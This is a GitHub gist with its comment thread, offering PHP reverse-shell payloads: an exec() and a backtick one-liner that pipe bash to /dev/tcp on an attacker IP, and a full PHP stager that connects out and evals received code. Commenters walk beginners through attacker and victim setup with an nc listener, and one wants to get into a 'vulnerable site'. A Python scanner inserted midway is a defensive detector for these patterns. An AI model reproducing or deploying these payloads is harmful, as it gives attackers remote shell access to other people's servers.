Gist: rshipp/eee36684db07d234c1cc
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
I had to look up what ngrok was.
So ngrok makes a localhost port public, like localhost:3000 -> publicweb.ngrok.io, so at this point you have something like a public subdomain and a public IP that forwards the connections to your localhost.
So when you execute the PHP script, it runs on the server that hosts the file (localhost) and tries to connect to the desired IP.
If your IP is in the same network as the server (or your routing table is configured to forward to another network), the server tries to make the connection serverip -> yourcomputerip:8080.
So the PHP is being executed on your server, not on another site. The file needs to be executed from the server that you want to connect to, so that the PHP on that system executes the bash command.
So if that other server (remote URL) executes that PHP (you upload the file and open the URL), you would need a public IP, because that server is on the internet and cannot find your physical IP. In this case you would need a public IP.
I hope this helps. Ask me if there is something that you don't understand.
I'm writing this on my phone and it is a bit difficult to structure the text.
Thank you so much for the reply. I'll try again with the public IP.
This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
it was bash not a php
@Cvar1984
It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works on Unix-based OSes with a bash shell executable in the "/bin/" path.
Yeah, I know it spawns bash using a PHP system call.
Then this is the tiniest
<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>
Yes, but the solution from Rapid7 works on any operating system because it does not utilize any system calls.
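The thread describes three variants of the same thing: a shell command pointed at bash's /dev/tcp (exec or the backtick operator), and the Rapid7 stager, which opens a socket from PHP itself and evals whatever it reads, so it never touches a shell. The following triage scanner is an added example, not code from the gist or from anyone in this thread; the sample PHP sources it scans are constructed inline and the rule names are my own.

```python
import re

# Constructed sample PHP sources (not files from the gist); each mirrors one
# pattern discussed in the thread, plus one benign file for comparison.
SAMPLES = {
    "exec_devtcp.php": (
        "<?php\n"
        "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'\");\n"
    ),
    "backtick.php": "<?=`\"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'\"`?>\n",
    "stager.php": (
        "<?php $s = stream_socket_client(\"tcp://{$ip}:{$port}\");\n"
        "$len = fread($s, 4); $b = fread($s, 64); eval($b);\n"
    ),
    "benign.php": "<?php\necho htmlspecialchars($_GET['name'] ?? 'world');\n",
}

# A shell-spawning function whose argument reaches bash's /dev/tcp pseudo-device.
SHELL_DEVTCP = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(.*?/dev/tcp/", re.S)
# The backtick operator is shell_exec() in disguise, so it needs its own rule.
BACKTICK_DEVTCP = re.compile(r"`[^`]*/dev/tcp/[^`]*`", re.S)
# The stager never calls a shell: it opens a socket from PHP and evals what it reads,
# so it is only caught by looking for a socket function together with eval().
SOCKET_FUNCS = re.compile(r"\b(stream_socket_client|fsockopen|socket_create)\s*\(")
CODE_EXEC = re.compile(r"\b(eval|create_function)\s*\(")


def classify(src: str) -> list[str]:
    """Return the names of the reverse-shell patterns found in one PHP source."""
    hits = []
    if SHELL_DEVTCP.search(src):
        hits.append("shell-exec-devtcp")
    if BACKTICK_DEVTCP.search(src):
        hits.append("backtick-devtcp")
    if SOCKET_FUNCS.search(src) and CODE_EXEC.search(src):
        hits.append("socket-then-eval")
    return hits


def scan(files: dict[str, str]) -> dict[str, list[str]]:
    """Classify every file; an empty list means nothing suspicious was found."""
    return {path: classify(src) for path, src in files.items()}


if __name__ == "__main__":
    for path, hits in scan(SAMPLES).items():
        print(f"{path}: {', '.join(hits) or 'clean'}")
```

The third rule is the one that matters for the Rapid7 variant: because that stager never spawns a shell, the two /dev/tcp rules alone would miss it.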
I don't know which IP to use, can someone please help me!
I'm on a VPN, in a virtual machine! I don't know whether to use the IP of the VPN connection, of the virtualized machine, or of my own machine!
- You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network: if you are on a VPN, both machines must be in that network, and those are the important IPs.)
- You have to open a listening port on your attacking machine (nc -nvlp 1234).
- You have to open a reverse shell and point it to your attacking machine (VPN IP and open listening port).
And that's all.
@SergioChicoITCL thank you very much, champ! You're the best!
@Serux
Thanks for the comment. If I understand you correctly,
here are the steps I followed:
nc -nvlp 8080
So what I want to achieve is to access the vulnerable site using the reverse shell. I am still a beginner, so forgive me for that. Is that possible?
Thank you so much.